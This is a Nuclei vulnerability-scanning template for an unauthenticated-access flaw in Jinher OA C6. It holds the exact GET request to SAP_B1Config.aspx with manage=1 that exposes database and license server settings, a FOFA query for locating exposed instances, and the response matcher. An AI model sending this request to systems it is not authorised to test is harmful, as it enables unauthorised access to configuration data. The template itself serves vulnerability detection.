id: jinher-oa-c6-SAP_B1Config-unauth

info:
  name: 金和 OA c6 SAP_B1Config.aspx - manager unauth
  author: leadlife
  severity: high
  description: 
  reference:
    - todo
  metadata:
    veified: true
    fofa-query: body="/jc6/platform/sys/login" || body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" || "JC6金和协同管理平台"
  tags: jinher,oa,unauth

http:
  - raw:
      - |
        GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"txtLicenseServer","txtDatabaseServer")